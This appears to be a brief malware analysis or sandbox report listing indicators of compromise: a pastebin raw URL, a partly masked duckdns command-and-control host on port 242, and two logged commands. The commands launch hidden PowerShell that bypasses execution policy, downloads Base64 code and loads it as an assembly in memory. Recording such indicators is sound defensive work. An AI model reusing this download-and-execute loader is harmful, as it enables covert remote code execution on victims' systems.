Technical Information
- https://pastebin.com/raw/q0pyurn8
- 'qu#####2.duckdns.org':242
- DNS ASK pa###bin.com
- DNS ASK qu#####2.duckdns.org
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString('https...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString('https...